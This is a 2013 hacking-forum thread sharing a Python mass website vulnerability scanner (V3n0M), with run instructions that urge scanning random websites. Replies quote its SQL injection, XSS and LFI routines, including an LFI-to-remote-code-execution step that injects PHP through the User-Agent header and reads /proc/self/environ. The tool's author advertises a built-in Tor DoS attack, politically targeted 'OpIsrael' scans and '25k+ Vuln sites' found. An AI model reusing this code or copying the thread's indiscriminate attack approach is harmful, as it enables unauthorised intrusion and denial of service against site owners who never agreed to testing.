Author Topic: One of the best website vulnerability scanners + tutorial  (Read 14499 times)

0 Members and 1 Guest are viewing this topic.

Offline DrSyba

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
One of the best website vulnerability scanners + tutorial
« on: March 02, 2013, 05:39:49 pm »

Source Code: Get It Here


Instructions:






Windows:


Download Python




Once installed, make a new text document, get the source code for the scanner, and copy paste it inside the text document. Then click file > save as > scanner.py > save
[spoiler]

[/spoiler]




Next open CMD, navigate to the directory of the file, once there, type scanner.py.
[spoiler]

[/spoiler]


Scan any website you want, or press enter to scan random websites. For good results, use 20+ threads, 100+ dorks, and 10+ pages.


Linux:


(Sorry, no images)


Copy the source code into a file and save it as scanner.py.


Open terminal and navigate to the location of the file.


Then type: python scanner.py



Scan any website you want, or press enter to scan random websites. For good results, use 20+ threads, 100+ dorks, and 10+ pages.

Offline Pak_Track

  • Royal Highness
  • ****
  • Posts: 762
  • Cookies: 69
  • Paratrooper
    • View Profile
    • My Home
Re: One of the best website vulnerability scanners + tutorial
« Reply #1 on: March 02, 2013, 07:56:47 pm »
Thanks for the share but most of us have used this software...

'Life is but a series of conflicts between the easy way and the right way.'
The more you know, the more you'll realize you know nothing. -Snayler
The problem with being a smart motherfucker is that sometimes the stupid motherfuckers think you're a crazy motherfucker.
dont u hate it when you offer help and the other person says yes -Pakalu Papito

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
    • View Profile
    • github
Re: One of the best website vulnerability scanners + tutorial
« Reply #2 on: March 02, 2013, 08:29:21 pm »
So EASY A CAVEMAN CAN DO IT!

I give you a -C for effort I guess.
>>>import this
-----------------------------

Offline condexx

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #3 on: March 04, 2013, 05:18:03 pm »
is good to see the work of our darkc0de communitystill around!

EMOKDOOM

  • Guest
Re: One of the best website vulnerability scanners + tutorial
« Reply #4 on: March 11, 2013, 07:24:57 am »
Alright, i feel dumb, but i can't get this to work.
I honestly googled the shit out of this and tried tackling it in a few different way, but i did it the EXACT way you say.

-Save file through IDLE as scanner.py
-Navigate to /home/'username'/Documents/python as that's where i saved it
-In terminal run: python scanner.py but i get an error message: python: can't open file 'scanner.py': [Errno 2] No such file or directory

I'm where the file is. Still novice to Python but it seems straightfoward so i'm asking for help. Running Fedora in case it matters.

Is it possible that i have to go through the code and putt >>> before every function def?



« Last Edit: March 11, 2013, 07:26:53 am by EMOKDOOM »

Offline aichi

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 2
  • aichi ninja
    • View Profile
    • aichi-ninja's github
Re: One of the best website vulnerability scanners + tutorial
« Reply #5 on: March 11, 2013, 07:29:45 am »
Code: [Select]
def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in sqlerrors.items(): if re.search(eMSG, source): print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found" logfile.write("\n"+host) vuln.append(host) col.append(host) break else: pass except: pass
this should have been expanding into breaking all the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.

Code: [Select]
def ClassicLFI(url): lfiurl = url.rsplit('=', 1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found" lfi_log_file.write("\n"+lfiurl+lfi) vuln.append(lfiurl+lfi) target = lfiurl+lfi target = target.replace("/etc/passwd","/proc/self/environ") header = "<? echo md5(baltazar); ?>" try: request_web = urllib2.Request(target) request_web.add_header('User-Agent', header) text = urllib2.urlopen(request_web) text = text.read() if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text): print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found" rce_log_file.write("\n",target) vuln.append(target) except: pass except: passThe LFI tester (above) only works on UNIX based systems. you can see they tried to break out the GET parms, but it's kinda ugly. i also suggest maybe they use a time() type of md5 instead of a steady "baltazar" md5 to check if the LFI was successful, otherwise it can be thwarted easily into giving a false-positive.

Code: [Select]
def ClassicXSS(url): for xss in xsses: try: source = urllib2.urlopen(url+xss.replace("\n","")).read() if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source): print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)" xss_log_file.write("\n"+url+xss) vuln.append(url+xss) except: pass
the xss checker (above) can be hugely expanded, plus what about content filtering? eh, this isn't very reliable. The sql scanners are ok, probably the best part of the whole scanner. nice code, but i think they have become lazy.
-- silence is not a virtue
http://aichi-ninja.blogspot.com/

Offline kenjoe41

  • Symphorophiliac Programmer
  • Administrator
  • Baron
  • *
  • Posts: 990
  • Cookies: 224
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #6 on: March 13, 2013, 12:47:14 am »
Quote
one of the best website scanner
this code is really buggy and i can bet it needs alot of editting work. goodluck with it.
« Last Edit: March 13, 2013, 02:30:42 am by kenjoe41 »
If you can't explain it to a 6 year old, you don't understand it yourself.
http://upload.alpha.evilzone.org/index.php?page=img&img=GwkGGneGR7Pl222zVGmNTjerkhkYNGtBuiYXkpyNv4ScOAWQu0-Y8[<NgGw/hsq]>EvbQrOrousk[/img]

Offline Bulldogslaxman

  • NULL
  • Posts: 2
  • Cookies: -1
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #7 on: April 02, 2013, 11:18:29 pm »
When ever I run this i get an error

Offline NovaCygni

  • Peasant
  • *
  • Posts: 86
  • Cookies: 2
  • 403:Forbidden
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #8 on: April 20, 2013, 04:33:13 pm »
Code: [Select]
def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in sqlerrors.items(): if re.search(eMSG, source): print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found" logfile.write("\n"+host) vuln.append(host) col.append(host) break else: pass except: pass
this should have been expanding into breaking all the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.

Code: [Select]
def ClassicLFI(url): lfiurl = url.rsplit('=', 1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found" lfi_log_file.write("\n"+lfiurl+lfi) vuln.append(lfiurl+lfi) target = lfiurl+lfi target = target.replace("/etc/passwd","/proc/self/environ") header = "<? echo md5(baltazar); ?>" try: request_web = urllib2.Request(target) request_web.add_header('User-Agent', header) text = urllib2.urlopen(request_web) text = text.read() if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text): print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found" rce_log_file.write("\n",target) vuln.append(target) except: pass except: passThe LFI tester (above) only works on UNIX based systems. you can see they tried to break out the GET parms, but it's kinda ugly. i also suggest maybe they use a time() type of md5 instead of a steady "baltazar" md5 to check if the LFI was successful, otherwise it can be thwarted easily into giving a false-positive.

Code: [Select]
def ClassicXSS(url): for xss in xsses: try: source = urllib2.urlopen(url+xss.replace("\n","")).read() if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source): print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)" xss_log_file.write("\n"+url+xss) vuln.append(url+xss) except: pass
the xss checker (above) can be hugely expanded, plus what about content filtering? eh, this isn't very reliable. The sql scanners are ok, probably the best part of the whole scanner. nice code, but i think they have become lazy.


This version is MASSIVELY outdated, Its a V.0.0.1 release... a Beta Release at that, Im on Version V.3.0.2 at the moment ;o Ive stopd all work on it though as the IRC I was part of is no longer fit for purpose so ive left and "Retired" from the scene until I can find a new home.



# V3n0MScanner.py - V.3.0.2
#    -Increased headers list to include mobile devices headers
#    -Increased XSS Detection by almost double, Detects Actual Bypass required for the attack to progress
#    -Increased LFI Detection rates
#    -Increased URL Detection rate for valid Vuln sites
#    -New Banner Style promoting V3n0M Scanner and Version details
#    -New method for identifying Version make: V.x.y.z Where x is the main release version, y is amount of Beta release versions and z is the
#     amount of alpha release versions. ie, V.3.0.2 is Main release build 3 that has had 0 Beta test phases and 2 Alpha release phases
#    -New Search Engine's powering the scanner so should give alot more results.
#    -Intergrated DoS Feature, now you can select to [1] Scan as you used to for vulnerabilitys or [2] TorSledgehammer DoS Attack
#    -New MultiPlatform version instead of the old Linux/Windows seperate releases
#    -TorSledgehammer DoS tool rotates attacks through multiple detected Internet connections to spread attack workload and increase DoS success rate.
#    -Added Israeli SearchEngines for increasing "Hit" ratio for "OpIsrael" scans.

    Please Note I do NOT support AnonSet anymore, the IRC's admin has no  interest  in protecting the safety of its members and frankly is unfit emotionally to run a IRC server. Anyone wishing to assist in working on the V3n0M toolkit or provide input please let me know.





tiny pic

*Edit
The Original poster was incorrect, the correct best settings are 100Threads over ToR or 200 Threads on a normal connection.

this code is really buggy and i can bet it needs alot of editting work. goodluck with it.

Beta, says it all :3 and wasnt that much editing really for anyone who understands the basics of Python...  Oh and yourll find even the beta version posted by the original poster still worked fine, even if it would give a 15% false positive hit, with a "all dorks scan" on .com yourd still get 25k+ Vuln sites. (* Not to mention the Original Poster posted a windows only version o.o might explain why some people failed to get it to run lol. *)
« Last Edit: April 20, 2013, 04:52:26 pm by NovaCygni »
We do what we want, Because we can.

Offline kat

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 1
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #9 on: April 30, 2013, 06:36:48 pm »
Somebody was talking about darkc0de. Found this some time ago:
http://rafale.org/~mattoufoutu/darkc0de.com/

Offline kenjoe41

  • Symphorophiliac Programmer
  • Administrator
  • Baron
  • *
  • Posts: 990
  • Cookies: 224
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #10 on: April 30, 2013, 11:28:51 pm »
Somebody was talking about darkc0de. Found this some time ago:
http://rafale.org/~mattoufoutu/darkc0de.com/

nice find but would have posted it in the found it on the weeb section.
If you can't explain it to a 6 year old, you don't understand it yourself.
http://upload.alpha.evilzone.org/index.php?page=img&img=GwkGGneGR7Pl222zVGmNTjerkhkYNGtBuiYXkpyNv4ScOAWQu0-Y8[<NgGw/hsq]>EvbQrOrousk[/img]

Offline Axon

  • VIP
  • King
  • *
  • Posts: 2047
  • Cookies: 319
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #11 on: May 01, 2013, 07:20:09 pm »
Somebody was talking about darkc0de. Found this some time ago:
http://rafale.org/~mattoufoutu/darkc0de.com/

The tutorial section is dead.

Offline kenjoe41

  • Symphorophiliac Programmer
  • Administrator
  • Baron
  • *
  • Posts: 990
  • Cookies: 224
    • View Profile
Re: One of the best website vulnerability scanners + tutorial
« Reply #12 on: May 01, 2013, 08:33:28 pm »
The tutorial section is dead.
yeah! i tried it too and like hell all the links where dead plus a few other in other sections.
But all in all i love the python scripts which i've been playing around with today.
If you can't explain it to a 6 year old, you don't understand it yourself.
http://upload.alpha.evilzone.org/index.php?page=img&img=GwkGGneGR7Pl222zVGmNTjerkhkYNGtBuiYXkpyNv4ScOAWQu0-Y8[<NgGw/hsq]>EvbQrOrousk[/img]